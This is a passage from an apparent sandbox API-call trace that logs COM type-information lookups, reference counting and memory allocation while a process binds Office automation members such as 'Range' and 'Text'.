[3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ff8 | out: ppvObject=0x203ff8*=0x0) returned 0x80004002 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ed0 | out: ppvObject=0x203ed0*=0x0) returned 0x80004002 [0045.668] IUnknown:Release (This=0x7f7aab8) returned 0x1 [0045.668] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.668] ITypeInfo:LocalReleaseFuncDesc (This=0x7f7aa08) returned 0x0 [0045.668] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204298 | out: ppvObject=0x204298*=0x0) returned 0x80004002 [0045.668] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.668] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.668] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.668] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.668] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x3b012ce | out: ppTypeAttr=0x204738, pDummy=0x3b012ce*=0x4) returned 0x0 [0045.668] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.668] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.668] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.668] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.668] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.668] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.668] GetCurrentProcess () returned 0xffffffffffffffff [0045.668] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.668] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.668] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.668] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204ae8 | out: ppvObject=0x204ae8*=0x0) returned 0x80004002 [0045.668] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204af0 | out: ppvObject=0x204af0*=0x0) returned 0x80004002 [0045.669] ITypeInfo:GetTypeComp (in: This=0x7f7aab8, ppTComp=0x204af8 | out: ppTComp=0x204af8*=0x7f7aac0) returned 0x0 [0045.669] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55d50 [0045.669] IUnknown:AddRef (This=0x7f7aac0) returned 0x5 [0045.669] IUnknown:Release (This=0x7f7aac0) returned 0x4 [0045.669] IMalloc:Realloc (This=0x7feff045380, pv=0x81e44a0, cb=0xc0) returned 0x8134a80 [0045.669] IUnknown:Release (This=0x7f7aab8) returned 0x3 [0045.669] IUnknown:Release (This=0x7f7aab8) returned 0x2 [0045.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f012e, cbMultiByte=6, lpWideCharStr=0x2045e0, cchWideChar=7 | out: lpWideCharStr="Range") returned 6 [0045.669] ITypeComp:RemoteBind (in: This=0x7f7aac0, szName="Range", lHashVal=0x100cda, wFlags=0x3, ppTInfo=0x204598, pDescKind=0x2045ac, ppFuncDesc=0x2045b0, ppVarDesc=0x3b0158e, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204598*=0x7f7aab8, pDescKind=0x2045ac*=1, ppFuncDesc=0x2045b0, ppVarDesc=0x3b0158e, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.669] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x2045a0, pDummy=0x1 | out: ppTypeAttr=0x2045a0, pDummy=0x1) returned 0x0 [0045.669] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.669] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aab8, hreftype=0x6a00, ppTInfo=0x203e58 | out: ppTInfo=0x203e58*=0x7f7ab10) returned 0x0 [0045.669] IUnknown:QueryInterface (in: This=0x7f7ab10, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204028 | out: ppvObject=0x204028*=0x0) returned 0x80004002 [0045.669] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab10, ppTypeAttr=0x203ea8, pDummy=0x10 | out: ppTypeAttr=0x203ea8, pDummy=0x10) returned 0x0 [0045.669] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab10) returned 0x0 [0045.669] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab10, index=0xffffffff, pRefType=0x203e8c | out: pRefType=0x203e8c*=0xfffffffe) returned 0x0 [0045.669] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab10, hreftype=0xfffffffe, ppTInfo=0x203e58 | out: ppTInfo=0x203e58*=0x7f7ab68) returned 0x0 [0045.669] IUnknown:Release (This=0x7f7ab10) returned 0x1 [0045.669] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff780, cb=0x40) returned 0x7fc2310 [0045.669] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfec40, cb=0x50) returned 0x7f18670 [0045.669] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203bb0 | out: ppvObject=0x203bb0*=0x0) returned 0x80004002 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ba0 | out: ppvObject=0x203ba0*=0x0) returned 0x80004002 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ba8 | out: ppvObject=0x203ba8*=0x0) returned 0x80004002 [0045.670] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203bd8, pDummy=0x10 | out: ppTypeAttr=0x203bd8, pDummy=0x10) returned 0x0 [0045.670] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.670] IUnknown:AddRef (This=0x7f7ab68) returned 0x2 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203d50 | out: ppvObject=0x203d50*=0x0) returned 0x80004002 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203d48 | out: ppvObject=0x203d48*=0x0) returned 0x80004002 [0045.670] IUnknown:Release (This=0x7f7ab68) returned 0x1 [0045.670] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204350, pDummy=0x0 | out: ppTypeAttr=0x204350, pDummy=0x0) returned 0x0 [0045.670] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.670] IUnknown:Release (This=0x7f7ab68) returned 0x1 [0045.670] IUnknown:Release (This=0x7f7ab68) returned 0x1 [0045.670] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x204400 | out: ppvObject=0x204400*=0x7f7aab8) returned 0x0 [0045.670] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x7f7aab8, memid=0, invkind=2, pFuncIndex=0x204440 | out: pFuncIndex=0x204440*=0x0) returned 0x0 [0045.670] ITypeInfo2:GetFuncCustData (in: This=0x7f7aab8, index=0x0, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204458 | out: pVarVal=0x204458*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x204500, varVal2=0x80f6a50)) returned 0x0 [0045.670] IUnknown:Release (This=0x7f7aab8) returned 0x3 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2043b8 | out: ppvObject=0x2043b8*=0x0) returned 0x80004002 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204290 | out: ppvObject=0x204290*=0x0) returned 0x80004002 [0045.670] IUnknown:Release (This=0x7f7ab68) returned 0x1 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2043b8 | out: ppvObject=0x2043b8*=0x0) returned 0x80004002 [0045.670] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204290 | out: ppvObject=0x204290*=0x0) returned 0x80004002 [0045.670] IUnknown:Release (This=0x7f7ab68) returned 0x1 [0045.670] IUnknown:AddRef (This=0x7f7aab8) returned 0x4 [0045.671] ITypeInfo:LocalReleaseFuncDesc (This=0x7f7aab8) returned 0x0 [0045.671] IUnknown:Release (This=0x7f7aab8) returned 0x3 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204658 | out: ppvObject=0x204658*=0x0) returned 0x80004002 [0045.671] IUnknown:AddRef (This=0x7f7aab8) returned 0x4 [0045.671] IMalloc:Realloc (This=0x7feff045380, pv=0x7fc22c0, cb=0x80) returned 0x811be10 [0045.671] IMalloc:Realloc (This=0x7feff045380, pv=0x7f186d0, cb=0xa0) returned 0x81968e0 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045e0 | out: ppvObject=0x2045e0*=0x0) returned 0x80004002 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045b0 | out: ppvObject=0x2045b0*=0x0) returned 0x80004002 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045a0 | out: ppvObject=0x2045a0*=0x0) returned 0x80004002 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045a8 | out: ppvObject=0x2045a8*=0x0) returned 0x80004002 [0045.671] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x2045d8, pDummy=0x10 | out: ppTypeAttr=0x2045d8, pDummy=0x10) returned 0x0 [0045.671] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.671] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.671] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.671] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.671] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.671] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x3b015ce | out: ppTypeAttr=0x204a18, pDummy=0x3b015ce*=0x4) returned 0x0 [0045.671] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813bc10 [0045.671] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.671] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.671] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.671] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.671] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.672] GetCurrentProcess () returned 0xffffffffffffffff [0045.672] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.672] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.672] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.672] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.672] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204480 | out: ppvObject=0x204480*=0x0) returned 0x80004002 [0045.672] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204450 | out: ppvObject=0x204450*=0x0) returned 0x80004002 [0045.672] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204440 | out: ppvObject=0x204440*=0x0) returned 0x80004002 [0045.672] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204448 | out: ppvObject=0x204448*=0x0) returned 0x80004002 [0045.672] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204478, pDummy=0x10 | out: ppTypeAttr=0x204478, pDummy=0x10) returned 0x0 [0045.672] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.672] IUnknown:AddRef (This=0x7f7ab68) returned 0x3 [0045.672] IUnknown:Release (This=0x7f7ab68) returned 0x2 [0045.672] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045d8 | out: ppvObject=0x2045d8*=0x0) returned 0x80004002 [0045.672] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2045e0 | out: ppvObject=0x2045e0*=0x0) returned 0x80004002 [0045.672] ITypeInfo:GetTypeComp (in: This=0x7f7ab68, ppTComp=0x2045e8 | out: ppTComp=0x2045e8*=0x7f7ab70) returned 0x0 [0045.672] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55d90 [0045.672] IUnknown:AddRef (This=0x7f7ab70) returned 0x6 [0045.672] IUnknown:Release (This=0x7f7ab70) returned 0x5 [0045.673] IMalloc:Realloc (This=0x7feff045380, pv=0x8134a80, cb=0xd0) returned 0x8116560 [0045.673] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.673] IUnknown:Release (This=0x7f7ab68) returned 0x3 [0045.673] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.673] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.673] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.673] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.673] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.673] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.673] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.673] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.673] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.673] IUnknown:Release (This=0x8137308) returned 0x1 [0045.673] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8062060 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8062060*="") returned 0x0 [0045.673] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.673] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.673] ITypeComp:RemoteBind (in: This=0x7f7ab70, szName="Text", lHashVal=0x10abed, wFlags=0x3, ppTInfo=0x203fa8, pDescKind=0x203fbc, ppFuncDesc=0x203fc0, ppVarDesc=0x4086b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x203fa8*=0x7f7ab68, pDescKind=0x203fbc*=1, ppFuncDesc=0x203fc0, ppVarDesc=0x4086b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.673] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203fb0, pDummy=0x1 | out: ppTypeAttr=0x203fb0, pDummy=0x1) returned 0x0 [0045.673] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.674] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203d60, pDummy=0x0 | out: ppTypeAttr=0x203d60, pDummy=0x0) returned 0x0 [0045.674] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.674] IMalloc:Realloc (This=0x7feff045380, pv=0x3ea42f0, cb=0x800) returned 0x8147e10 [0045.674] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x203e10 | out: ppvObject=0x203e10*=0x7f7ab68) returned 0x0 [0045.674] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x7f7ab68, memid=0, invkind=2, pFuncIndex=0x203e50 | out: pFuncIndex=0x203e50*=0x0) returned 0x0 [0045.674] ITypeInfo2:GetFuncCustData (in: This=0x7f7ab68, index=0x0, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x203e68 | out: pVarVal=0x203e68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x203f10, varVal2=0x80f6a50)) returned 0x0 [0045.674] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.674] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.674] ITypeInfo:LocalReleaseFuncDesc (This=0x7f7ab68) returned 0x0 [0045.674] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.674] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204068 | out: ppvObject=0x204068*=0x0) returned 0x80004002 [0045.674] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.674] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.674] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.674] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.674] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.674] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.674] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x3b0184e | out: ppTypeAttr=0x204508, pDummy=0x3b0184e*=0x4) returned 0x0 [0045.674] IMalloc:Realloc (This=0x7feff045380, pv=0x8061f10, cb=0x400) returned 0x3ea42f0 [0045.674] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.674] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.674] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.675] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.675] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.675] GetCurrentProcess () returned 0xffffffffffffffff [0045.675] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.675] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.675] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.675] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.675] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.675] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.675] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.675] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.676] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.676] IUnknown:Release 